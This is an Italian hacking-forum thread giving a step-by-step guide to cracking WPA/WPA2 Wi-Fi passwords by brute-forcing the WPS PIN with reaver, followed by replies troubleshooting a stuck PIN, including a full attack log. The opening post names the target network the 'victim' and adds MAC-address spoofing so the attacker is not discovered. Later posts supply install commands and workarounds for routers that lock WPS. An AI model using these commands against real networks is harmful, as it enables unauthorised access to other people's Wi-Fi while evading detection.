Craccare WPA/WPA2 con reaver wps

Stato
Discussione chiusa ad ulteriori risposte.

insidehackers

Utente Gold
28 Giugno 2013
641
30
222
318
Ultima modifica da un moderatore:
Ho deciso di scrivere questa guida perchè nel forum sono presenti solo guide di aircrack che nel caso delle wpa ci porta quasi certamente ad un fallimento nel tentare di crakkare l'handshake.
Questo tool che è presente nella suite di aircrack che pochi conoscono ci consente di craccare una wpa o wpa2 in poche ore!! senza alcun bisogno di dizionary ecc... Il suo nome è reaver-ng, reaver sfrutta un bug del canale wps effettuando un bruteforce del pin di 8 cifre, quindi è efficace solo su AP con il WPS attivato.
Ma basta chiacchiere e passiamo alla pratica reaver per funzionare ha bisogno anche di aircrack nello specifico di airmon-ng per settare la scheda di rete in monitor mode
quindi il primo passo e digitare da terminale

Codice:
airmon-ng start wlan0

Ora la nostra scheda è in monitor mode
Il Secondo passo è scegliere la vittima cercandola con il programma che più ci piace io usero airodump-ng

Codice:
airodump-ng mon0

Quando avremo trovato la vittima stoppiamo lo scan con Ctrl + C e copiamo il bssid della vittima
Ora come terzo passo andiamo all'attacco, procedendo cosi:

Configurazione:
Codice:
reaver -i "interfaccia" -b "bssid vittima" -vv
Esempio:
Codice:
reaver -i mon0 -b 11:22:33:44:55:66 -vv

Il "-vv" sta per verbosity cioè mostra in dettaglio quello che sta facendo il programma, digitando:

Se invece vogliamo utilizzare un pin personale il codice sarà:
Codice:
reaver -i mon0 -b 11:22:33:44:55:66 -vv -p "pin personale"
Script per calcolare il pin - http://www.inforge.net/community/wifi-hacking-guide/402708-calcolare-pin-wps-router.html

Codice:
reaver --help
Si stamperanno a video tutte le opzioni aggiuntive

Se invece non stiamo testando il nostro AP ma vogliamo effettuare un attacco senza essere scoperti è necessario cambiare il mac del nostro pc. sempre dal terminale di backtrack digitiamo

Codice:
ifconfig wlan0 down
ifconfig wlan0 hw ether "nuovo mac inventato"
ifconfig wlan0 up

Spero che la guida vi sia servita :D e spero anche di non aver dimenticato nulla
 
Volevo chiederti una cosa, ho provato molte guide ma tutte mi portano a un errore....
Invece di provare vari PIN, l'attacco prova sempre il PIN 12345670 senza cambiare e mai e di conseguenza lavora a vuoto.
Sai dove possa essere l'intoppo? Grazie mille!
 
Il problema può essere che il router blocca i fakeauth e qui diventa un po piu complesso l'attacco e difficile da spiegare oppure è semplicemente un problema di scarsa potenza del segnale
 
Ultima modifica:
Anche a me dá il problema del pin sempre fermo a 12345670;il segnale è 4 tacche su 5, e tale rimane su tutta la casa... hai detto che se il router bloccasse i fakeauth sarebbe un po' più complessa la cosa, ma sarebbe eventualmente fattibile?
 
Salve, ho provato il primo comando dal terminale di Windows dopo aver scaricare aircrack-ng. Presenta un errore: "airmon-ng" non è riconosciuto come comando interno o esterno, un programma eseguibile o un file batch. Come posso risolvere (da Windows naturalmente, precisamente w8)
 
Per digitare i comandi nel DOS in questo modo dovresti impostare le variabili d'ambiente ,comunque devi fare cd nella cartella dei file bin di aircrack e digitare il filename completo es. Airodump-ng.exe
Airmon non è presente nella versione di windows, se vuoi cimentati in queste cose e sei un principiante ti consiglio di installati linux invece di complicarti la vita su windows
 
ciao
insidehackers,scusami ti volevo chiedere se questi tools andrebbero istallati prima o procedendo cosi come dimostrato nella tua guida?grazie
 
Se stai usando ubuntu devi installarli digita da terminale
Codice:
[B]sudo apt-get[/B] install libssl-dev build-essential libsqlite3-dev unrar gedit
gedit /etc/apt/sources.list

Aggiungi al file queste stringhe
Codice:
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Ed infine
Codice:
apt-get update
apt-get install reaver aircrack-ng

Seguendo questi passaggi avrai la possibilta di scaricare tutti i tool presenti in kali
 
ciao insidehackers grazie per avermi risposto.ma scusami per la mia ignoranza ti devo chiedere ancora in po di cose,abbi pazienza con me.da terminale devo digitare tutto il codice o un pezzo a la volta poi invio?le stringhe dove che le devo aggiungere?grazie
 
ciao insidehackers grazie per avermi risposto.ma scusami per la mia ignoranza ti devo chiedere ancora in po di cose,abbi pazienza con me.da terminale devo digitare tutto il codice o un pezzo a la volta poi invio?le stringhe dove che le devo aggiungere?grazie

Il comando
Codice:
[B]sudo apt-get[/B] install libssl-dev build-essential libsqlite3-dev unrar gedit
gedit /etc/apt/sources.list
lo dai in una dose,diciamo. (dopo aver scaricato ed installato [apt-get install] ti si aprirà via gedit(Un editor di testi) il file sources.list ed è lì che dovrai aggiungere le repistory di Kali)

Gli ultimi due comandi dalli singolarmente
 
Il comando
Codice:
[B]sudo apt-get[/B] install libssl-dev build-essential libsqlite3-dev unrar gedit
gedit /etc/apt/sources.list
lo dai in una dose,diciamo. (dopo aver scaricato ed installato [apt-get install] ti si aprirà via gedit(Un editor di testi) il file sources.list ed è lì che dovrai aggiungere le repistory di Kali)

Gli ultimi due comandi dalli singolarmente

digitando sudo apt-get install libssl-dev build-essential libsqlite3-dev unrar gedit
gedit /etc/apt/sources.list mi installa kali?
 
Ho anch'io il problema che prova sempre lo stesso PIN c'è una soluzione? grazie
Il router che sto testando è un technicolor e sono riuscito a provare i primi 3 PIN poi si è bloccato il wps (verificato con la funzione wash) quindi l'ho resettato e la funzione wash mi conferma che il WPS è tornato attivo. Ora però prova sempre il PIN 12345670
Il segnale è tra i -50 e -60, (tacche al max del wifi)
 
Ecco il log:

======Home ======
Created Monday 20 October 2014

root@kali:~# iwconfig
wlan1 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff

eth0 no wireless extensions.

lo no wireless extensions.

wlan0 IEEE 802.11abgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff

root@kali:~# airmon-ng start wlan1


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3226 NetworkManager
3338 wpa_supplicant


Interface Chipset Driver

wlan1 Atheros AR9271 ath9k - [phy1]
(monitor modeenabled on mon0)
wlan0 Intel 6205 iwlwifi - [phy0]

root@kali:~# kill 3226
root@kali:~# kill 3338
root@kali:~# airodump-ng wlan1



























CH 10 ][ Elapsed: 8 s ][ 2014-10-2019:54

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

9C:97:26:9A:0D:A9 -68 9 1 0 6 54e WPA2 CCMP PSK TNCAP
E8:CD:2D:92:67:7B -88 5 0 0 1 54e. WPA2 CCMP PSK WebCu
64:87:D7:BC:01:AC -89 4 0 0 1 54 WPA TKIP PSK FASTW

BSSID STATION PWR Rate Lost Frames Probe

(not associated) B8:78:2E:5D:EA:1A -56 0 - 1 14 10













CH 9 ][ Elapsed: 2 mins ][ 2014-10-20 19:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

9C:97:26:9A:0D:A9 -63 227 13 0 6 54e WPA2 CCMP PSK TNCAP9A0DA9
00:24:89:3E:3E:15 -90 9 0 0 1 54e WEP WEP Vodafone-11110983
E8:CD:2D:92:67:7B -91 50 0 0 1 54e. WPA2 CCMP PSK WebCube42-677B
64:87:D7:BC:01:AC -91 21 0 0 1 54 WPA TKIP PSK FASTWEB-LUCA

BSSID STATION PWR Rate Lost Frames Probe


root@kali:~# reaver -i mon0 -b 9C:97:26:9A:0D:A9 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner<[email protected]>

[+] Waiting for beacon from 9C:97:26:9A:0D:A9
[+] Switching mon0 to channel 6
[+] Associated with 9C:97:26:9A:0D:A9 (ESSID: TNCAP9A0DA9)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin

…………………………avanticosì per un’ora……………………………………………………………………
[!]WARNING: 10 failed connections in a row
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2014-10-20 21:11:06 (0 seconds/pin)
[+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin


…………………………e qui dopo un’ora circa si ferma…………………………………………

root@kali:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E8:CD:2D:92:67:7B 1 -89 1.0 Yes WebCube42-677B
9C:97:26:9A:0D:A9 6 -68 1.0 No TNCAP9A0DA9

[QUOTE]

Come spiegavo nel post precedente solo la prima volta che ho provato a craccare questa rete reaver è riuscito a provare 3 PIN e dopo di chè il router ha bloccato la WPS. Quindi ho tolto l'alimentazione al router e a quel punto si è sbloccato ma da allora riprova sempre lo stesso PIN come dal log
Grazie dell'aiuto;)
 
Ultima modifica:
Ho provato, ma nn cambia nulla. Sempre l'errore:

[!] WPS transaction failed (code: 0x04), re-trying last pin

Scusami se nn rispondo subito ma nn mi arrivano le mail di notifica
 
Cancella questo file /usr/local/etc/reaver/<mac>.wpc e riavvia reaver poi usa l'opzione -m , se neanche questo non dovesse funzionare vuol dire che il roter ha un sistema WPS-PBC , cioè con la pressione del tasto wps che reaver non può craccare
 
Ma per cancellare quel file devo digitare qualcosa da terminale?
Ah io uso la modalità live con chiavetta usb, nn ce l'ho installato come sistema operativo è lo stesso?
Se dovesse funzionare c'è un modo per nn far bloccare il router dopo 2 tentativi?
 
Ma per cancellare quel file devo digitare qualcosa da terminale?
Ah io uso la modalità live con chiavetta usb, nn ce l'ho installato come sistema operativo è lo stesso?
Se dovesse funzionare c'è un modo per nn far bloccare il router dopo 2 tentativi?

Si,funziona anche da live-cd...per quanto riguarda i tentativi non credo ci sia alcun metodo
 
Stato
Discussione chiusa ad ulteriori risposte.